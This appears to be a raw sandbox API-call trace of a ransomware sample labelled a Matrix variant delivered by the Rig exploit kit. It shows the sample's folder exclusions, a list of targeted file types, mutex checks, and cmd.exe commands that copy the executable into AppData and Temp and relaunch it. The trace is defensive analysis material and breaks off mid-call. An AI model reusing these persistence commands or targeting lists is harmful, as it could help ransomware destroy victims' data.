CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0092.226] GetCurrentThreadId () returned 0xa8c [0092.226] GetCurrentThreadId () returned 0xa8c [0092.226] GetCurrentThreadId () returned 0xa8c [0092.226] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0092.226] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0092.226] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0092.226] LockResource (hResData=0x516f58) returned 0x516f58 [0092.226] FreeResource (hResData=0x516f58) 
returned 0 [0092.226] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0092.226] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0092.226] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0092.226] LockResource (hResData=0x50d64c) returned 0x50d64c [0092.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0092.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0092.226] FreeResource (hResData=0x50d64c) returned 0 [0092.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0092.226] GetCurrentThreadId () returned 0xa8c [0092.226] GetCurrentThreadId () returned 0xa8c [0092.227] GetCurrentThreadId () returned 0xa8c [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13c39b8, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13c39b8, cbMultiByte=97, lpWideCharStr=0x1370e8c, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 
[0092.227] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0092.227] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0092.227] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0092.227] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0092.227] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="13StarterProcessMutex4") returned 0x0 [0092.227] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="13StarterProcessMutex4") returned 0xb8 [0092.227] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="24MainProcessMutex5") returned 0x0 [0092.227] GetTickCount () returned 0x22664 [0092.227] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=14901651231) returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="X@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: 
lpWideCharStr="E@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="Y@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="8@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="d@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="7@ﰤ\x12\x0f") returned 1 [0092.228] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="z@ﰤ\x12\x0f") returned 1 [0092.228] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="I@ﰤ\x12\x0f") returned 1 [0092.228] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa40, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0092.228] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE") returned 0x25 [0092.228] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0092.228] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb 
| out: lpsz="[FROM_PATH]") returned 0xb [0092.228] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\") returned 0x2a [0092.228] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"[TO_PATH]\"", cchLength=0x3a | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\DESKTOP\\2017-0~1.EXE\" > \"[TO_PATH]\"") returned 0x3a [0092.228] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0092.228] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbac*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb9c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"", lpProcessInformation=0x12fb9c*(hProcess=0xc0, hThread=0xbc, dwProcessId=0xa90, dwThreadId=0xa94)) returned 1 [0092.265] WaitForSingleObject (hHandle=0xc0, dwMilliseconds=0xffffffff) returned 0x0 [0092.832] CloseHandle (hObject=0xc0) returned 1 [0092.832] CloseHandle (hObject=0xbc) returned 1 [0092.832] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x2020 [0092.832] GetTickCount () returned 0x22828 
[0092.832] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=14962169966) returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="C@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="N@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="u@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="u@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="8@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="V@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="y@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="t@ﰤ\x12\x0f") returned 1 [0092.833] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0092.833] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > 
\"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0092.833] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0092.833] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0092.833] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0092.833] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0092.833] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\CNUU8VYT.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\CNUU8VYT.EXE\" [PARAMS]") returned 0xb1 [0092.833] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0092.833] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 
lpStartupInfo=0x12fb44*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb34 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessInformation=0x12fb34*(hProcess=0xc0, hThread=0xbc, dwProcessId=0xaac, dwThreadId=0xab0)) returned 1 [0092.840] CloseHandle (hObject=0xc0) returned 1 [0092.840] CloseHandle (hObject=0xbc) returned 1 [0092.840] Sleep (dwMilliseconds=0xfa) [0093.095] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x13ff63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0093.095] GetProcAddress (hModule=0x76910000, lpProcName="CreateToolhelp32Snapshot") returned 0x7694f731 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x13e2d2c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListFirst") returned 0x769a02e7 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListNext") returned 0x769a0391 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x13e2d2c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Heap32First") returned 0x769a0429 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x13e2d2c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Heap32Next") returned 0x769a0614 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x13ff63c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x769a0819 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Process32First") returned 0x7697443d [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0093.097] GetProcAddress 
(hModule=0x76910000, lpProcName="Process32Next") returned 0x76974505 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x13e2d2c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x13e2d2c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
